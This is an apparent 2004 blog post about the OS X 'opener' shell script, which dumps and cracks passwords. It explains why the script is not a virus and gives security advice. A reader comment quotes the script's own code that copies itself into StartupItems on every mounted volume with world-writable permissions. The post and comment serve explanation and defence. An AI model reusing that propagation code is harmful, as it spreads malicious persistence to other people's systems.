Opener and Hardening the Mac

There has been much wide-eyed hysteria on the Mac sites concerning "opener". While the comments on these sites have generally been on top of it, the news continues to spread calling it a virus or trojan horse. Check out the macintouch story that broke it.

To clear up the confusion, opener is a shell script that does a lot of little insidious things to your OS X box, including dumping your passwords from netinfo and trying to crack them. This script requires an administrator password to be installed, so the level of threat it poses is relatively small.

To be clear here, this is not a virus or a trojan horse. It does not self-replicate, or masquerade as another application to be installed. This is not to say that someone couldn't package it up and make it look official, but it has not currently gotten that far.

At present, this is purely a security issue. You shouldn't run applications that ask for an administrator password without being sure of the source you obtained them from. You shouldn't allow administrators on your machine that you do not implicitly trust. You should not use the same password for your login on your computer that you use for networked systems. You should not allow physical access to your computer to someone you don't implicitly trust. Passwords should be changed regularly.

Good security policy is a pain in the ass to maintain, but if you want a secure environment, you must maintain it.

Posted by Joe Mullins at October 25, 2004 10:16 AM | TrackBack
Comments

Thank you for your (solitary?!) rational article on opener!

One thing: it really does try to spread but only to locally mounted volumes. (It can't spread to network shares because even if it runs as root locally that does not give it root privileges on an AFP share.) Here's the code from the script:

# Copy this startup script to any mounted startup volume.
ls /Volumes | while read vol; do
if test -d /Volumes/"${vol}"/System/Library ; then
mkdir /Volumes/"${vol}"/System/Library/StartupItems
cp -R /System/Library/StartupItems/"${scriptpath}" /Volumes/"${vol}"/System/Library/StartupItems/
chmod -Rf 777 /Volumes/"${vol}"/System/Library/StartupItems/
fi
done

http://freaky.staticusers.net/ugboard/viewtopic.php?t=10712&postdays=0&postorder=asc&start=120

Posted by: mike donleigh at October 26, 2004 06:36 PM

Trackback

TrackBack URL for this entry:
http://techgoesboom.com/cgi-bin/mt-tb.cgi/290

Here's what others have to say about Opener and Hardening the Mac:

Post a comment









Remember personal info?